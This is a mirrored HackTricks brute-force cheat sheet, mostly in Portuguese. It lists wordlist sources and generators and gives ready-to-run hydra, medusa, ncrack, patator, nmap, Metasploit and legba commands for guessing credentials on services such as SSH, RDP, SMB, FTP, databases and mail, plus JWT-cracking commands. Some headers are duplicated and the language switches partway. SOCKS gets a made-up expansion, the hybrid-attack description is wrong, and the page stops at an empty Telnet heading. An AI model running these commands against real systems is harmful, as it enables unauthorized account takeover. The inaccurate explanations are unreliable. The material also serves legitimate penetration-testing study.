mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-24 20:13:37 +00:00
926 lines
47 KiB
Markdown
926 lines
47 KiB
Markdown
# Brute Force - CheatSheet
|
||
|
||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
\
|
||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** facilmente com as ferramentas comunitárias mais avançadas do mundo.\
|
||
Acesse hoje:
|
||
|
||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||
|
||
<details>
|
||
|
||
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Outras formas de apoiar o HackTricks:
|
||
|
||
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||
* Adquira [**produtos oficiais PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
||
</details>
|
||
|
||
## Credenciais Padrão
|
||
|
||
**Pesquise no Google** por credenciais padrão da tecnologia que está sendo usada, ou **experimente estes links**:
|
||
|
||
* [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet)
|
||
* [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html)
|
||
* [**http://www.vulnerabilityassessment.co.uk/passwordsC.htm**](http://www.vulnerabilityassessment.co.uk/passwordsC.htm)
|
||
* [**https://192-168-1-1ip.mobi/default-router-passwords-list/**](https://192-168-1-1ip.mobi/default-router-passwords-list/)
|
||
* [**https://datarecovery.com/rd/default-passwords/**](https://datarecovery.com/rd/default-passwords/)
|
||
* [**https://bizuns.com/default-passwords-list**](https://bizuns.com/default-passwords-list)
|
||
* [**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv**](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv)
|
||
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
|
||
* [**https://www.cirt.net/passwords**](https://www.cirt.net/passwords)
|
||
* [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com)
|
||
* [**https://many-passwords.github.io/**](https://many-passwords.github.io)
|
||
* [**https://theinfocentric.com/**](https://theinfocentric.com/)
|
||
|
||
## **Crie seus próprios Dicionários**
|
||
|
||
Obtenha o máximo de informações possível sobre o alvo e gere um dicionário personalizado. Ferramentas que podem ajudar:
|
||
|
||
### Crunch
|
||
```bash
|
||
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
|
||
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
|
||
|
||
@ Lower case alpha characters
|
||
, Upper case alpha characters
|
||
% Numeric characters
|
||
^ Special characters including spac
|
||
crunch 6 8 -t ,@@^^%%
|
||
```
|
||
### Cewl
|
||
|
||
Cewl é uma ferramenta que pode ser usada para criar listas de palavras-chave a partir de um site ou documento fornecido. Isso pode ser útil para realizar ataques de força bruta com base em palavras-chave relevantes ao alvo.
|
||
```bash
|
||
cewl example.com -m 5 -w words.txt
|
||
```
|
||
### [CUPP](https://github.com/Mebus/cupp)
|
||
|
||
Gerar senhas com base no seu conhecimento sobre a vítima (nomes, datas...)
|
||
```
|
||
python3 cupp.py -h
|
||
```
|
||
### [Wister](https://github.com/cycurity/wister)
|
||
|
||
Uma ferramenta geradora de listas de palavras, que permite fornecer um conjunto de palavras, dando-lhe a possibilidade de criar várias variações a partir das palavras fornecidas, criando uma lista de palavras única e ideal para usar em relação a um alvo específico.
|
||
```bash
|
||
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
|
||
|
||
__ _______ _____ _______ ______ _____
|
||
\ \ / /_ _|/ ____|__ __| ____| __ \
|
||
\ \ /\ / / | | | (___ | | | |__ | |__) |
|
||
\ \/ \/ / | | \___ \ | | | __| | _ /
|
||
\ /\ / _| |_ ____) | | | | |____| | \ \
|
||
\/ \/ |_____|_____/ |_| |______|_| \_\
|
||
|
||
Version 1.0.3 Cycurity
|
||
|
||
Generating wordlist...
|
||
[########################################] 100%
|
||
Generated 67885 lines.
|
||
|
||
Finished in 0.920s.
|
||
```
|
||
### [pydictor](https://github.com/LandGrey/pydictor)
|
||
|
||
### Listas de Palavras
|
||
|
||
* [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists)
|
||
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
|
||
* [**https://github.com/kaonashi-passwords/Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi)
|
||
* [**https://github.com/google/fuzzing/tree/master/dictionaries**](https://github.com/google/fuzzing/tree/master/dictionaries)
|
||
* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)
|
||
* [**https://weakpass.com/wordlist/**](https://weakpass.com/wordlist/)
|
||
* [**https://wordlists.assetnote.io/**](https://wordlists.assetnote.io/)
|
||
* [**https://github.com/fssecur3/fuzzlists**](https://github.com/fssecur3/fuzzlists)
|
||
* [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager)
|
||
* [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists)
|
||
|
||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
\
|
||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir facilmente e **automatizar fluxos de trabalho** com as ferramentas comunitárias mais avançadas do mundo.\
|
||
Acesse hoje:
|
||
|
||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||
|
||
## Serviços
|
||
|
||
Ordenados alfabeticamente pelo nome do serviço.
|
||
|
||
### AFP
|
||
```bash
|
||
nmap -p 548 --script afp-brute <IP>
|
||
msf> use auxiliary/scanner/afp/afp_login
|
||
msf> set BLANK_PASSWORDS true
|
||
msf> set USER_AS_PASS true
|
||
msf> set PASS_FILE <PATH_PASSWDS>
|
||
msf> set USER_FILE <PATH_USERS>
|
||
msf> run
|
||
```
|
||
### AJP
|
||
|
||
O protocolo AJP (Apache JServ Protocol) é um protocolo binário que permite a comunicação entre um servidor web e um servidor de aplicativos Java. Ele é comumente usado para melhorar o desempenho de servidores web ao delegar tarefas de processamento de aplicativos Java para um servidor de aplicativos dedicado.
|
||
```bash
|
||
nmap --script ajp-brute -p 8009 <IP>
|
||
```
|
||
## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)
|
||
```bash
|
||
legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]
|
||
```
|
||
### Cassandra
|
||
|
||
Cassandra é um banco de dados distribuído altamente escalável que permite armazenar e gerenciar grandes quantidades de dados em vários servidores sem um único ponto de falha.
|
||
```bash
|
||
nmap --script cassandra-brute -p 9160 <IP>
|
||
# legba ScyllaDB / Apache Casandra
|
||
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042
|
||
```
|
||
### CouchDB
|
||
|
||
CouchDB é um banco de dados NoSQL que pode ser alvo de ataques de força bruta. Os hackers podem tentar adivinhar credenciais de login válidas usando combinações de nomes de usuário e senhas comuns. É importante garantir que senhas fortes e autenticação de dois fatores sejam implementadas para proteger o CouchDB contra ataques de força bruta.
|
||
```bash
|
||
msf> use auxiliary/scanner/couchdb/couchdb_login
|
||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
|
||
```
|
||
### Registro do Docker
|
||
```
|
||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
|
||
```
|
||
### Elasticsearch
|
||
```
|
||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
|
||
```
|
||
### FTP
|
||
|
||
FTP (File Transfer Protocol) é um protocolo padrão usado para transferir arquivos pela rede.
|
||
```bash
|
||
hydra -l root -P passwords.txt [-t 32] <IP> ftp
|
||
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
|
||
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
|
||
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
|
||
```
|
||
### Brute Force Genérico HTTP
|
||
|
||
#### [**WFuzz**](../pentesting-web/web-tool-wfuzz.md)
|
||
|
||
### Autenticação Básica HTTP
|
||
```bash
|
||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
|
||
# Use https-get mode for https
|
||
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
|
||
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/
|
||
```
|
||
### HTTP - NTLM
|
||
|
||
#### Brute Force Attack
|
||
|
||
Um ataque de força bruta contra a autenticação NTLM é uma técnica comum usada para quebrar senhas. Neste tipo de ataque, um hacker tenta todas as combinações possíveis de senhas até encontrar a correta. Isso pode ser feito de forma manual ou automatizada usando ferramentas especializadas. É importante usar senhas fortes e implementar medidas de segurança adicionais, como bloqueio de contas após um número específico de tentativas falhas, para mitigar esse tipo de ataque.
|
||
```bash
|
||
legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
|
||
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
|
||
```
|
||
### HTTP - Post Form
|
||
|
||
#### Brute Force
|
||
|
||
Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is often used to crack passwords by trying all possible combinations.
|
||
|
||
#### Dictionary Attack
|
||
|
||
A dictionary attack is a type of brute force attack where a predefined list of words is used as the potential passwords. This method is more efficient than a standard brute force attack as it reduces the number of possible combinations to try.
|
||
|
||
#### Hybrid Attack
|
||
|
||
A hybrid attack combines elements of both brute force and dictionary attacks. It first tries all possible combinations of characters, and then uses a dictionary to try common words or passwords.
|
||
|
||
#### Rainbow Table Attack
|
||
|
||
A rainbow table attack is a precomputed table for reversing cryptographic hash functions, usually used to crack password hashes. This method can significantly speed up the cracking process by avoiding the need to compute the hash for each attempt.
|
||
|
||
#### Credential Stuffing
|
||
|
||
Credential stuffing is a type of brute force attack where large sets of stolen credentials are automatically entered into login forms until a match is found. This method relies on users reusing passwords across multiple accounts.
|
||
```bash
|
||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
|
||
# Use https-post-form mode for https
|
||
```
|
||
Para http**s** você tem que mudar de "http-post-form" para "**https-post-form"**
|
||
|
||
### **HTTP - CMS --** (W)ordpress, (J)oomla or (D)rupal or (M)oodle
|
||
```bash
|
||
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
|
||
# Check also https://github.com/evilsocket/legba/wiki/HTTP
|
||
```
|
||
### IMAP
|
||
|
||
IMAP (Internet Message Access Protocol) is a standard email protocol that stores email messages on a mail server. When a user reads an email, it remains stored on the server until the user deletes it. IMAP allows for multiple devices to be synchronized and access the same mailbox.
|
||
```bash
|
||
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
|
||
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
|
||
nmap -sV --script imap-brute -p <PORT> <IP>
|
||
legba imap --username user --password data/passwords.txt --target localhost:993
|
||
```
|
||
### IRC
|
||
|
||
#### Brute Force
|
||
|
||
Brute force attacks on IRC servers are typically carried out using automated scripts that attempt to guess usernames and passwords. These scripts can be targeted at the IRC server itself or at services such as NickServ, which manages user nicknames.
|
||
|
||
To protect against brute force attacks on IRC servers, it is important to use strong, unique passwords and to implement account lockout policies that temporarily lock accounts after a certain number of failed login attempts. Additionally, monitoring login attempts and enforcing strong password policies can help mitigate the risk of a successful brute force attack.
|
||
```bash
|
||
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
|
||
```
|
||
### ISCSI
|
||
```bash
|
||
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
|
||
```
|
||
### JWT
|
||
```bash
|
||
#hashcat
|
||
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
|
||
|
||
#https://github.com/Sjord/jwtcrack
|
||
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
|
||
|
||
#John
|
||
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
|
||
|
||
#https://github.com/ticarpi/jwt_tool
|
||
python3 jwt_tool.py -d wordlists.txt <JWT token>
|
||
|
||
#https://github.com/brendan-rius/c-jwt-cracker
|
||
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
|
||
|
||
#https://github.com/mazen160/jwt-pwn
|
||
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
|
||
|
||
#https://github.com/lmammino/jwt-cracker
|
||
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
|
||
```
|
||
### LDAP
|
||
```bash
|
||
nmap --script ldap-brute -p 389 <IP>
|
||
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match
|
||
```
|
||
### MQTT
|
||
|
||
#### Brute Force
|
||
|
||
Brute forcing MQTT credentials involves trying all possible combinations of usernames and passwords until the correct one is found. This can be done using tools like Hydra or custom scripts.
|
||
|
||
#### Prevention
|
||
|
||
To prevent brute force attacks on MQTT, it is recommended to:
|
||
- Use strong and unique passwords
|
||
- Implement account lockout mechanisms after a certain number of failed login attempts
|
||
- Monitor MQTT logs for suspicious login activities
|
||
- Consider implementing two-factor authentication for an added layer of security.
|
||
```
|
||
ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v
|
||
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt
|
||
```
|
||
### Mongo
|
||
```bash
|
||
nmap -sV --script mongodb-brute -n -p 27017 <IP>
|
||
use auxiliary/scanner/mongodb/mongodb_login
|
||
legba mongodb --target localhost:27017 --username root --password data/passwords.txt
|
||
```
|
||
### MSSQL
|
||
|
||
#### Brute Force
|
||
|
||
Brute force attacks against MSSQL servers can be performed using tools like Hydra or Ncrack. These tools allow you to systematically try all possible combinations of usernames and passwords until the correct one is found. It is important to note that brute force attacks can be time-consuming and may trigger account lockouts if too many failed attempts are made. It is recommended to use strong and complex passwords to mitigate the risk of a successful brute force attack.
|
||
```bash
|
||
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
|
||
```
|
||
### MySQL
|
||
|
||
MySQL is a popular open-source relational database management system. It is commonly used in web applications to store and retrieve data. MySQL databases can be targeted using brute force attacks to guess usernames and passwords. These attacks can be automated using tools like Hydra or Burp Suite Intruder. It is important to use strong and unique credentials, as well as implement security measures like account lockouts to protect against brute force attacks.
|
||
```bash
|
||
# hydra
|
||
hydra -L usernames.txt -P pass.txt <IP> mysql
|
||
|
||
# msfconsole
|
||
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
|
||
|
||
# medusa
|
||
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
|
||
|
||
#Legba
|
||
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306
|
||
```
|
||
### OracleSQL
|
||
|
||
#### Brute Force
|
||
|
||
Brute force attacks are commonly used to crack passwords by trying all possible combinations until the correct one is found. In the context of OracleSQL, brute force attacks can be used to guess usernames and passwords to gain unauthorized access to databases.
|
||
|
||
#### Prevention
|
||
|
||
To prevent brute force attacks in OracleSQL, it is recommended to:
|
||
- Implement strong password policies
|
||
- Enforce account lockout policies after a certain number of failed login attempts
|
||
- Monitor and log login attempts for suspicious activities
|
||
- Use multi-factor authentication for an added layer of security
|
||
|
||
By following these prevention measures, you can significantly reduce the risk of falling victim to brute force attacks in OracleSQL.
|
||
```bash
|
||
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
|
||
|
||
./odat.py passwordguesser -s $SERVER -d $SID
|
||
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
|
||
|
||
#msf1
|
||
msf> use admin/oracle/oracle_login
|
||
msf> set RHOSTS <IP>
|
||
msf> set RPORT 1521
|
||
msf> set SID <SID>
|
||
|
||
#msf2, this option uses nmap and it fails sometimes for some reason
|
||
msf> use scanner/oracle/oracle_login
|
||
msf> set RHOSTS <IP>
|
||
msf> set RPORTS 1521
|
||
msf> set SID <SID>
|
||
|
||
#for some reason nmap fails sometimes when executing this script
|
||
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
|
||
|
||
legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt
|
||
```
|
||
Para usar **oracle\_login** com **patator**, você precisa **instalar**:
|
||
```bash
|
||
pip3 install cx_Oracle --upgrade
|
||
```
|
||
[Força bruta de hash OracleSQL offline](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**versões 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** e **11.2.0.3**):
|
||
```bash
|
||
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
|
||
```
|
||
### POP
|
||
|
||
#### Brute Force
|
||
|
||
Brute force attacks are one of the simplest and most common hacking techniques. They consist of systematically checking all possible passwords or encryption keys until the correct one is found. Brute force attacks can be time-consuming but are often successful if the password is weak or the encryption key is short.
|
||
|
||
##### Tools
|
||
|
||
- **Hydra**: A popular password-cracking tool that can perform rapid dictionary attacks or brute force attacks.
|
||
- **Medusa**: A speedy, parallel, and modular login brute-forcer.
|
||
- **Ncrack**: A high-speed network authentication cracking tool.
|
||
- **John the Ripper**: A fast password cracker.
|
||
- **Hashcat**: An advanced password recovery tool.
|
||
|
||
##### Countermeasures
|
||
|
||
- Implement account lockout policies to prevent multiple failed login attempts.
|
||
- Use complex and unique passwords that are resistant to brute force attacks.
|
||
- Implement multi-factor authentication to add an extra layer of security.
|
||
- Monitor and analyze login attempts for any suspicious activity.
|
||
```bash
|
||
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
|
||
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
|
||
|
||
# Insecure
|
||
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110
|
||
|
||
# SSL
|
||
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl
|
||
```
|
||
### PostgreSQL
|
||
|
||
PostgreSQL é um sistema de gerenciamento de banco de dados relacional de código aberto amplamente utilizado. É conhecido por sua confiabilidade e recursos avançados.
|
||
```bash
|
||
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
|
||
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
|
||
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
|
||
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
|
||
use auxiliary/scanner/postgres/postgres_login
|
||
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
|
||
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432
|
||
```
|
||
### PPTP
|
||
|
||
Você pode baixar o pacote `.deb` para instalar em [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/)
|
||
```bash
|
||
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
|
||
cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>
|
||
```
|
||
### RDP
|
||
```bash
|
||
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
|
||
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
|
||
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]
|
||
```
|
||
### Redis
|
||
```bash
|
||
msf> use auxiliary/scanner/redis/redis_login
|
||
nmap --script redis-brute -p 6379 <IP>
|
||
hydra –P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
|
||
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]
|
||
```
|
||
### Rexec
|
||
|
||
### Rexec
|
||
|
||
Rexec is a simple service that allows users to execute commands on a remote system. It is often used for testing purposes and troubleshooting. Rexec can be a target for brute force attacks, where an attacker tries to guess the username and password to gain unauthorized access to the remote system. It is important to use strong authentication methods and implement rate limiting to protect against brute force attacks on Rexec services.
|
||
```bash
|
||
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
|
||
```
|
||
### Rlogin
|
||
|
||
Rlogin é um protocolo de rede que permite a um usuário fazer login em um sistema remoto. É vulnerável a ataques de força bruta devido à falta de mecanismos de segurança robustos. Durante um ataque de força bruta ao Rlogin, um hacker tentará várias combinações de nomes de usuário e senhas para obter acesso não autorizado ao sistema remoto. É altamente recomendável desativar o Rlogin e usar métodos de autenticação mais seguros, como SSH.
|
||
```bash
|
||
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
|
||
```
|
||
### Rsh
|
||
|
||
O Rsh (Remote Shell) é um serviço que permite aos usuários executar comandos em um sistema remoto. É importante estar ciente de que o Rsh não é seguro, pois as credenciais de login são enviadas em texto simples, o que torna vulnerável a ataques de força bruta. É altamente recomendado evitar o uso do Rsh e optar por alternativas mais seguras, como SSH (Secure Shell).
|
||
```bash
|
||
hydra -L <Username_list> rsh://<Victim_IP> -v -V
|
||
```
|
||
[http://pentestmonkey.net/tools/misc/rsh-grind](http://pentestmonkey.net/tools/misc/rsh-grind)
|
||
|
||
### Rsync
|
||
```bash
|
||
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
|
||
```
|
||
### RTSP
|
||
```bash
|
||
hydra -l root -P passwords.txt <IP> rtsp
|
||
```
|
||
### SFTP
|
||
```bash
|
||
legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
|
||
# Try keys from a folder
|
||
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
|
||
```
|
||
### SNMP
|
||
```bash
|
||
msf> use auxiliary/scanner/snmp/snmp_login
|
||
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
|
||
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
|
||
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
|
||
```
|
||
### SMB
|
||
|
||
O SMB (Server Message Block) é um protocolo de compartilhamento de arquivos e impressoras usado principalmente por sistemas Windows. É comum usar força bruta para tentar obter acesso não autorizado a compartilhamentos SMB. Isso pode ser feito usando ferramentas como Hydra, Medusa ou até mesmo scripts personalizados. É importante ter em mente que a força bruta pode ser detectada facilmente por sistemas de segurança, portanto, é essencial tomar medidas adicionais para proteger os compartilhamentos SMB contra ataques desse tipo.
|
||
```bash
|
||
nmap --script smb-brute -p 445 <IP>
|
||
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
|
||
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]
|
||
```
|
||
### SMTP
|
||
|
||
### SMTP
|
||
```bash
|
||
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
|
||
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
|
||
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]
|
||
```
|
||
### SOCKS
|
||
|
||
SOCKS stands for **S**ocket **O**ver **C**omplete **K**it **S**ervice and is a protocol that allows a client to establish a connection to a server through a proxy server. This can be useful for bypassing firewalls or accessing restricted content.
|
||
```bash
|
||
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
|
||
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
|
||
# With alternative address
|
||
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080
|
||
```
|
||
### SQL Server
|
||
|
||
#### Brute Force
|
||
|
||
Brute force attacks against SQL Server involve attempting to guess usernames and passwords to gain unauthorized access. This can be done using automated tools that systematically try all possible combinations of usernames and passwords until the correct one is found. Brute force attacks can be time-consuming but are often successful if weak or common credentials are used. It is essential to use strong, unique passwords and implement other security measures to protect against brute force attacks.
|
||
```bash
|
||
#Use the NetBIOS name of the machine as domain
|
||
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
||
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
|
||
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
|
||
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
|
||
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
|
||
```
|
||
### SSH
|
||
|
||
### SSH
|
||
```bash
|
||
hydra -l root -P passwords.txt [-t 32] <IP> ssh
|
||
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
|
||
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
|
||
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
|
||
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
|
||
# Try keys from a folder
|
||
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
|
||
```
|
||
#### Chaves SSH fracas / Debian PRNG previsível
|
||
|
||
Alguns sistemas possuem falhas conhecidas na semente aleatória usada para gerar material criptográfico. Isso pode resultar em um espaço de chaves dramaticamente reduzido que pode ser quebrado por ferramentas como [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute). Conjuntos pré-gerados de chaves fracas também estão disponíveis, como [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
|
||
|
||
### STOMP (ActiveMQ, RabbitMQ, HornetQ e OpenMQ)
|
||
|
||
O protocolo de texto STOMP é um protocolo de mensagens amplamente utilizado que **permite comunicação e interação perfeitas com serviços populares de filas de mensagens** como RabbitMQ, ActiveMQ, HornetQ e OpenMQ. Ele fornece uma abordagem padronizada e eficiente para trocar mensagens e realizar várias operações de mensagens.
|
||
```bash
|
||
legba stomp --target localhost:61613 --username admin --password data/passwords.txt
|
||
```
|
||
### Telnet
|
||
|
||
